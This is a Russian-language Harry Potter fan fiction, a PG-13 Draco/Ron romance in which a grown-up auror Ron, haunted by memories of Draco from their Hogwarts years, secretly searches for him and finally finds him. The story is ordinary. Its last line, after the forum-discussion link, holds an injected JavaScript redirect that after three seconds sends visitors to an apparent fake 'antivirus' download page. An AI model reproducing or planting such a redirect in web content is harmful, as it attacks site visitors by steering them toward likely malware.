Я согрею...

Автор: Нюшка
Пейринг: Драко/Рон
Рейтинг: PG-13
Дисклеймер: всё, как всегда, принадлежит Роулинг, я просто примазалась
Жанр: romance 

«Восемь лет жизни  - псу под хвост»,  – тоскливо думал Рон Уизли, возвращаясь  домой.

Обычный вечер, каких за эти восемь лет было сотни и сотни.

Сейчас он аппарирует в Нору, выслушает порцию охов-вздохов матери,  криво улыбнется похвалам отца – да, да, еще один преступник надежно упрятан в Азкабан  - съест на ужин что-то умопомрачительно изобретательное, но недорогое… Потом найдет повод уйти из столовой  (сколько же раз у него болела голова?)   и рухнет на постель в своей комнате.

Вкрадчивые сумерки незаметно сменит тихий вечер, заглянет в окно луна,  выступит на темно синем бархате небосвода крупная соль созвездий… Блин! Вот развелось  чертовой беллетристики с романтикой в голове-то. Ему, Рону Уизли вся эта чушь ни к чему. Не затронет.  Он только покажет язык дуре-луне да скользнет взглядом по звездам, прикидывая, насколько ясный день ждет Англию завтра.  Ему же не до красот природы! Он же, прострел Мерлину в спину,  очень занят. Он же, черт побери все красоты мироздания, мечтает  об этом мерзавце Драко Малфое, и его ждет славный вечерок наедине с этими до чрезвычайности приятными мыслями.  А когда наконец удастся уснуть,  этот хорек еще и приснится.  Ну а если чертов сон не дойдет до Норы, заблудится по дороге,  Рону предстоит  крутиться в кровати и всю ночь мечтать о небесных чертах слизеринского красавчика. Офигенное разнообразие, не правда ли?

Ну и какого дьявола Драко Малфой  привязался к Рону Уизли?

Сны и мечты, мечты и сны.  И так каждую ночь. Но этого уроду-Малфою  мало.  Он умудрялся иногда портить   даже  дни Рона – те дни, когда в потайной  ящик стола аврора Уизли ложилось очередное донесение.  Рон сам не понимал, откуда у него нашлось столько хитрости: он умудрился оформить это исключительно личное дело, как секретное шпионское поручение. И над его выполнением даже трудилась пара агентов. Стыда Уизли  не испытывал. В конце концов, при такой зарплате не грех воспользоваться хоть какими-то преимуществами, предоставляемыми работой в аврорате.

Да, Рон искал Драко Малфоя. Даже не задумываясь – зачем. Сколько было за эти годы безликих блондинов, которые в итоге оказывались кем угодно, только не Драко Малфоем, слизеринцем и гаденышем, который  неизвестно каким колдовством  плотно обосновался в мыслях Рона Уизли…?

Вечер прошел по предугаданному сценарию. Даже  уснуть удалось. Уже закрывая глаза, уже  минуя грань между сновидением и реальностью, Рон зацепился взглядом за Луну…

Нет…Не Луна…

Большой фонарь…

Тишина была оглушающей. Рон всхлипнул последний раз, вытер нос рукавом мантии…

- Фред – дурак,  - громко и вызывающе сказал он. Вернее, попытался сказать громко и вызывающе. А получился только дрожащий писк. Но даже этот негромкий звук в ночном лесу прозвучал взрывом.  Словно разбуженные человеческим голосом, проснулись подозрительные  шорохи, вкрадчивые потрескивания… Рон даже присел от страха, обхватив руками колени. Глаза снова обожгло слезами.  «А Джордж - вообще придурок», - горько подумал Рон, но вслух произнести не решился. Братья вечно подшучивали над ним, и шутки никогда не были нежными.  Но, отправив Рона искать Гарри и Гермиону в Запретный лес, Фред и Джордж перешли границу. Если мама узнает - ой, что она с ними сделает! Приятные мысли о том, какое наказание способна придумать Молли Уизли для оболтусов-близнецов, посмевших так подшутить над младшим братом, на мгновение согрели Рона. Но тут же  он вспомнил о всей  глубине своего несчастья…Он один в Запретном лесу и он кажется заблудился… А здесь чудовища всякие. И блуждающие огни…Вот один уже  приближается…

Ой, нет! Это фонарь! Рон забыл о страшных звуках, прячущихся в тишине, и побежал на свет.

Возле толстого дуба, поставив на камень большой фонарь, сидел Драко Малфой. Он сидел абсолютно неподвижно, не сводя глаз с призрачно мерцающей за стеклом свечи.

- Ма-а-а-л…, - начал было Рон.

- Тс-с-с-с,  - Драко приложил палец к губам. -  Не испугай ее. Смотри…

- Что? – прошептал Рон, невольно проникаясь торжественностью момента.

-  Ночная бабочка, - Драко не говорил, а словно намечал звуки губами.

Больше минуты Рон, как загипнотизированный, смотрел на танцующую в круге света большую ночную бабочку. То плавно, то резко двигались прозрачные крылья, иногда задевая  фонарь, и тогда в луче искрами рассыпалась золотистая пыльца.

- Красиво, - выдохнул Драко.

- Да, - эхом подтвердил Рон, но тут же опомнился. – Эй, маменькин сыночек, а ты чего тут делаешь?

Малфой тоже словно опомнился.

- Не твое дело!

Оба ощетинились и приготовились вцепиться друг в друга. Минута разделенного любования красотой была забыта.

-Эй, кто ето  тут шастает? – громовой голос Хагрида раскатился по лесу. – Первоклашки, смотри ты…А вот как  отведу вас к деканам!

- Не надо к деканам, - в один голос выкрикнули Драко и Рон.

- Ну-ка тогда, оба-два – марш из лесу! – рявкнул Хагрид.

Малфой, как испуганный заяц, припустил по еле различимой тропинке. Рон, не задумываясь, рванул за ним. И вскоре  Малфой спускался в слизеринское подземелье, а Рон поднимался в башню Гриффиндора.

Рон Уизли был очень доволен. Он один побывал в Запретном лесу (те минуты, когда от страха тряслись колени, Рон уже забыл), утер нос близнецам, сказал пару ласковых Малфою…

А все-таки…Как она танцевала…

А у Малфоя были такие глаза…

Какой то серый день. Ни одного мало-мальски приличного дела. Всякая мелочь, всякая шушера. Шелуха. Ничего такого,  что могло бы занять руки и мозги. Ничего такого, что могло бы отвлечь от навязчивых мыслей о… Нет, вот об этом черте белобрысом думать не будем. Забыть, забыть…

Рон Уизли потянулся и поднялся с кресла. Скоро вечер. Сегодня он ужинает  с Гарри и Гермионой. Все-таки  -  приятное разнообразие в его бледной жизни.

Рон уже надевал плащ, когда раздался стук в окно.

Очередная сова, очередное бесполезное донесение о каком-то мелком хулиганстве. «Подождет до завтра», - подумал аврор и взялся за ручку двери. В конце концов -  еще ни одна сова не испытывала серьезных неудобств из-за  того, что ей пришлось переночевать в министерской совятне.

Рон сам не знал, почему вместо того, чтобы закрыть за собой двери и пойти на ужин с друзьями он вернулся в кабинет, открыл окно и впустил птицу… Может потому, что сова было черная. И очень красивая.

Через минуту Рон Уизли  перебирал легкие листки письма. Еще одно донесение от его агента, занятого поисками Малфоя…

Драко? Или  - нет? Вряд ли.

Рон  вглядывался в не слишком четкую фотографию. Еще один безликий блондин.

Похож или не похож?

Комната, постель, Луна. Полупрозрачные листки донесения.

Да, Рон знал, что присниться ему сегодня

Движения нервных пальцев…

Рон Уизли никогда не завидовал богатству семьи Драко Малфоя. Тем более, он никогда не завидовал  чистоте и древности малфоевского рода. Если уж на то пошло, семейство Уизли тоже могло предъявить длиннющие свитки, содержащие исключительно имена предков,  выписанные  бисерно-мелким почерком. Но каждый раз, когда под сводами Большого зала величественно парила сова Драко Малфоя,  Рон Уизли испытывал позорный приступ чёрной зависти -  это была самая красивая сова, которую только можно себе представить. И быть обладателем такого сокровища Уизли хотелось просто до дрожи в коленях.  Изредка, когда сова Малфоя отдыхала в Хогвардской совятне, гриффиндорец приходил туда просто посмотреть на нее. Это был большой секрет, о  котором  - Рон поклялся себе – никто и никогда не узнает.

Вот и сегодня Рон проводил восхищенным взглядом гордую почтальоншу, которая, покружив над слизеринским столом, небрежно сбросила на колени хозяину маленький сверток и полетела прочь. Столь же небрежно Малфой перебрал корреспонденцию, выбрал одно письмо и удалился из зала, высоко вскинув голову. Уизли давно наблюдал за процессом получения Малфоем почты, и знал, что тот предпочитает изучать полученные  письма в одиночестве. Рон даже знал где. Еще один секрет, о котором он не проболтался бы даже под пытками – Рон Уизли иногда подсматривал за тем, как  Драко Малфой читает письма. Просто это было…так красиво.

Драко Малфой садился на подоконник высокого готического окна в дальнем конце большого хогвардского холла. Он не сразу вскрывал письмо, сначала долго крутил  в руках конверт,  устремив взгляд в пространство. За эти мгновения его лицо менялось – привычное высокомерно-брезгливое выражение стиралось, и гордый юный аристократ становился только маленьким мальчиком. Потом  худенькие пальцы Драко, ловко орудуя ножичком для бумаги, разрезали конверт и извлекали исписанные листочки.

Написанное в  письме, отражалось на лице Драко, словно и идеальном зеркале.  Поднятые домиком брови – радостное удивление. Снисходительная улыбка – умиление. Мимолетно опустившиеся уголки губ – легкая грусть.  Складка между бровей  - недоумение. Закушенная губа - гнев. Или страх? Беглая, ясная улыбка – нежность, нежность, нежность…

Рон, ловя отголоски чужих эмоций, досадовал на себя. Ну глупо же. Это же – придурок Малфой! Да и письма-то всего лишь от малфоевской мамочки. Рон вспоминал письма Молли и в очередной раз испытал недоумение – ну чему  там можно так радоваться?  А Малфой еще бережно прячет эти письма во внутренний карман мантии, да и хранит их наверняка где-то на дне сундука, перевязанные розовой ленточкой…Тьфу! Маменькин сыночек, что еще скажешь?

- Что, очередное письмишко от мамочки? – откуда-то вынырнул Блейз Забини и презрительным тоном озвучил мысли Рона.

Малфой еле заметно вздрогнул, а на его  лицо наползла привычная брезгливая гримаска.

- Ага. Маман меня обожает, - пренебрежительно ответил он.

- Все матери такие -  не понимают, что нам уже не нужна опека и их сопливые послания, - бросил Блейз, и слизеринцы пошли к лестнице, ведущей в подземелье…

Проходя мимо камина, Малфой небрежно бросил  белые листочки в жадную пасть. Подхваченная жаром тонкая бумага на мгновение взлетела над огнем, словно живое существо. Словно бабочка. А потом сгорела, превратившись в россыпь оранжевых искр.

Рон видел, как напряжены плечи уходящего Малфоя. Откуда-то он точно знал, что тому стоит огромных усилий не броситься обратно к камину.

Но Драко даже не обернулся.

Больше Рон не следил за  Малфоем. А когда красавица-сова появлялась в большом зале, он отворачивался.

А зависть…Сгорела, наверное.

Насыщенный день. Преследования по каминной сети, задержание, арест с риском для жизни, вспышки фотоаппаратов – оказывается, они арестовали кого-то важного. И единственная мысль, не дающая задуматься даже об обеспечении собственной безопасности: ехать или не ехать. 

Рон знал, что нужно ехать. Взять билет на маггловский поезд и под перестук колес отправится в неизвестность, отправится поговорить с тем безликим, который мог оказаться Драко Малфоем. Рон Уизли точно знал, что именно нужно делать, но не мог себя заставить.  Он слишком боялся очередного разочарования. Эта поездка станет уже двадцать второй. Двадцать один раз Рон брал билет.  «Тук-тук», -  стучали колеса. «Он-он», -  стучало сердце. Двадцать один раз сердце ошибалось. Такой вот предательский орган…

Вечер в родительском доме, истерика Молли, неловкие восторги отца – они слишком испугались за сына в этот раз и не сумели сдержать накопившейся за время его службы в аврорате страх – успешно симулированная головная боль…Впрочем, даже симулировать не пришлось. В голове ворочался огненный монстр, и сразу было понятно, что уснуть не удастся.

К окончанию бессонной ночи Рон  твердо убедил  себя, что на этот раз все правильно, что на этот раз он заглянет в голубые глаза и скажет, наконец …Впрочем он найдет что сказать… Он всегда умел выбирать слова.

-  Если ты... Еще хоть раз…,  - угрожающе проговорил Рон Уизли.

Он до сих пор кипел, вспоминая выходку Малфоя на квиддичном матче. А Малфой стоял, сложив руки на груди, и ухмылялся этой  своей гаденькой улыбочкой.

Ну и чего хочется нормальному человеку, когда он видит искаженные в высокомерной гримасе губы? Правильно – вмазать. И навсегда стереть эту дрянь с морды врага. А если чего-то очень хочется… Рон Уизли размахнулся… А, надо сказать, что драться Рон умел, но дрался весьма своеобразно.  Он прошел суровую школу младшего из пяти  братьев. Честно побеждать в драке, когда ты самый маленький  невозможно, и Рон освоил сложную технику именуемую «ударь и беги»… Не успел. Даже ударить не успел, не то что убежать.

Странным было то, что худощавый, почти хрупкий на вид Малфой оказался таким сильным. Только что Рон замахивался для неслабой плюхи, а уже в следующее мгновение  он  протирал затылком пыльный пол хогвардского коридора…

Острый локоть Малфоя упирался куда-то в район солнечного сплетения, и не то  что говорить, даже дышать было проблематично.

- Ах, как трогательно ты защищаешь своего Поттера. У меня сейчас слезы от умиления потекут…

- Убери локоть, - прохрипел Рон. Он чувствовал, что у него тоже сейчас слезы потекут, только не от умиления, а от  боли.

- Простите великодушно, - издевательски протянул Драко, но локоть сместил, и Рон с облегчением сделал вдох.

- И чего ты  на меня налетел? -  миролюбиво  спросил Малфой после паузы.

Рон снова ощутил вскипающее бешенство.

 - Ты со своими шуточками дементорскими едва не убил Гарри!  Попробуй только повторить…

- Дурак ты Уизли, -  Малфой внезапно отпустил Рона и встал. Даже руку протянул, чтобы помочь врагу подняться. Вот гад.

Теперь они стояли лицом к лицу.

 - В конечном итоге в дураках-то я остался, -  иронично протянул Драко.  -  Твой золотой мальчик Гарри вполне прилично шарахнул меня Патронусом. Это, знаешь ли, больно.

 - А ты откуда знаешь, чем он тебя…?

 - Тоже мне -  высшая магия,  - презрительно проговорил Драко. -  Я этот Патронус в  десять лет выучил, да еще как!

-  Зачем? -  недоуменно спросил Рон. Заклинание защиты не относилось к самым распространенным заклинаниям. Тем более, обучать такому десятилетнего ребенка…

Драко опустил глаза.

- Пришлось, - коротко, ничего не объясняя, ответил он. Что-то странное прозвучало в голосе Драко, и Рон пристально уставился ему в лицо. Выражение глаз было знакомым. Страх, тоска, обреченность. Такие глаза были у Гарри, после встречи с дементором в поезде. «Ему пришлось защищаться от дементоров», - внезапно с ужасом понял Уизли.

Рон даже открыл рот, чтобы сказать что-то утешающее. Кажется, Малфой это почувствовал и мгновенно  утешился. И заставил Рона ощутить последствия.

- Ты так  защищаешь Поттера!  Такая дружба, ах, такая дружба… - Малфой лицемерно закатил глаза. – А  может, – Малфой понизил голос до интимного шепота, – не совсем дружба? Может, вы играете в эти милые игры…

-К-какие игры, – почему-то Рон покраснел. Вопроса он не понял, но догадался, что Малфой имеет в  виду  какую-то гадость…

- А вот в такие…

Малфой игриво подцепил пальцем подбородок Рона и впился в губы поцелуем…

Рон долго не мог отдышаться. Малфой смотрел  на него серьезно, без улыбки.

- А у тебя губы сладкие, – внезапно сказал Драко лишенным интонаций голосом. Потом развернулся и ушел в сторону слизеринских подземелий.

Рон растеряно улыбнулся. Кажется, ему нравилось…

Уже некоторое время Рон Уизли жил со странным чувством, что дни становятся все короче, и сны теперь занимают большую часть суток.  Иллюзии высасывали силы и трепали нервы. Они -  черт побери Малфоя, его мамочку, его папочку и всю его родню до тринадцатого колена – даже мешали Рону Уизли выполнять профессиональный долг! Иногда, заполняя протокол задержания или  составляя описание волшебной палочки преступника, Рон проваливался в очередное милое…

- А вот сейчас вызову Гарри, - Рон сам слышал, как неуверенно звучит голос. 

- Не вызовешь, -  Драко был холоден и спокоен.

Рон разрывался на части. Он точно знал, что должен сделать - закричать «Держи вора», «Пожар» или еще что-то, не важно, что. Главное, что в этот отдаленный участок Хогвартского парка сбегутся люди. Гарри, авроры. Они уведут предателя и почти убийцу Драко Малфоя, запрут в какой-нибудь камере в Министерстве. Рон Уизли станет героем, Рона Уизли, может быть, даже наградят, Гарри будет пожимать ему руку и восхищенно смотреть в глаза…

А по ночам Рону до конца его дней будет сниться презрительный взгляд, брошенный из под белесых ресниц…

Да, Рон просто обязан был поступить именно так. Но он не сделал этого. Он сделал то, чего ему хотелось так давно, что казалось -  он родился только для этого.  Он сел рядом с Малфоем на скамейку и ткнулся лбом в его плечо…

-Ну зачем? Ну зачем ты это сделал?

Улыбки Малфоя Рон не увидел. Но почувствовал.

- А что мне было делать, а? Героически гибнуть за дело спасения колдовского мира  - это судьба Гарри Поттера, а не Драко Малфоя, - голос Драко прозвучал привычно язвительно.

Внезапно он приподнял руку,  намериваясь обнять Уизли, но заколебался, и Рон уже думал, что Драко так и не решится. Но рука все-таки легла на плечо, и Рон замер, забыв обо всем, ощущая только тепло объятия.

- Они грозили тебя…убить? – внезапно Рон осознал, что где-то в прошлом  Драко была  развилка, выбор. И если бы Драко выбрал по-другому,  эта, такая желанная для Рона Уизли минута никогда бы не наступила.

- Да им и не надо было грозить, – сейчас Рон понял, что это спокойствие в голосе не равнодушие, а усталость. – Не важно. Ты не поймешь.  Там замешана честь рода и бесчестье рода. Сложные-сложные материи, непонятные такому олуху как ты.

Рон не обиделся, он понял, что Драко шутит.

Они долго просто молча сидели. Рядом.

- Я пойду.

Драко поднялся,  разрывая объятия.

- Нет! – потери еще не было, а боль потери уже накрыла Рона с головой. – Нет! Я поговорю с Гарри, тебя простят…Ведь ты же не убил…

- Ты думаешь,  я боюсь…ваших? – насмешливо спросил Драко. – Нет, все-таки ты глупец. Ты ничего не сможешь сделать, я все решил. Падать на колени и руки целовать не нужно – я не останусь, - последние фразы прозвучали ненужным вызовом.

Уизли промолчал. Говорить с плотно закушенными губами сложно.

Перед уходом Драко его поцеловал. Просто мимолетное прикосновение.

В одиночестве Рон просидел на скамейке несколько минут,  прислушиваясь к себе.  Никаких эмоций. Пустота.

 … воспоминание. Ему казалось, что эти сеансы выгрызают из его жизни огромные временные куски, но, вероятно, они занимали всего несколько секунд – никто из коллег не успевал заметить мысленного отсутствия Рона. Это было сродни сумасшествию, и перспектива вот так вот отключится во время чего-то более серьезного, чем бумажная волокита,  была  довольно пугающей.

Уизли твердо решил не ехать. В конце концов, в его жизни и так было много безымянных поездов, безымянных гостиниц, безымянных блондинов. Хотелось поставить на ситуации красивый жирный крест. Перестать мучить себя несбыточными мечтами и завести друга.  Новичок-стажер разве что не облизывал пухлые губки розовым языком, когда смотрел в сторону Рона.  Все, закончили, вечером вместо того, чтобы сесть в поезд, Рон пригласит на свидание стажера…

Стучали колеса. Рон твердо велел себе не засыпать – и не уснул. Он так же запретил себе мечтать – и в его голове не возникало ни единого образа.

Зябли в карманах руки.

Рон Уизли шел по старому, не слишком ухоженному провинциальному парку поддевая носками ботинок ржавые листья. Он слушал тихий шорох и думал  над простым ответом на простой вопрос.

- Зачем? Зачем ты меня нашел? – негромко спросил идущий рядом человек.

В этом сером, словно припрошенном пылью молодом мужчине невозможно было узнать былого лощеного Драко Малфоя.

- Я… Я не знаю,  -  растерянно пробормотал Рон.

Драко закурил. В сгущающихся бесцветных сумерках апельсиновый огонек сигареты  тлел бесстыдно ярко. Кружась, опускался на землю опавший лист. На мгновение он прянул на свет, как бабочка -  к фонарю, как прозрачные странички письма – к огню камина.   А Рон думал о том,  каким длинным мог бы быть ответ на короткий вопрос.  В голове мелькали обрывки собственных фантазий – и маленький уютный домик у моря, и закаты, которые так приятно наблюдать вдвоем, сидя на крыльце, и яростные споры  по любому поводу, и примирения, и жаркие ночи…

Все эти романтические бредни влюбленного идиота.

Все эти такие простые мечты.

То, к чему стремится любой – счастье с любимым человеком.

Поэтому ответ на вопрос Драко получился очень коротким:

- Черт его знает. Наверное, я просто хочу с тобой жить.

Скептический смешок  и  равнодушное лицо, освещенное луной.  Рон закрыл глаза -  не особенно хотелось снова видеть, как уходит  Драко Малфой.

Холодные пальцы коснулись щеки Рона.

- Что мне всегда нравилось в гриффиндорцах – это их безрассудная смелость… Ты же даже не знаешь, кем я стал за эти годы? Неужели совсем не страшно?

- Нет, - пожал плечами Рон. – Ведь я нашел тебя – значит, самое страшное уже позади.

- Я думал, что ты забыл меня.

- Дурак ты Малфой. И руки у тебя замерзли…Я согрею.

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>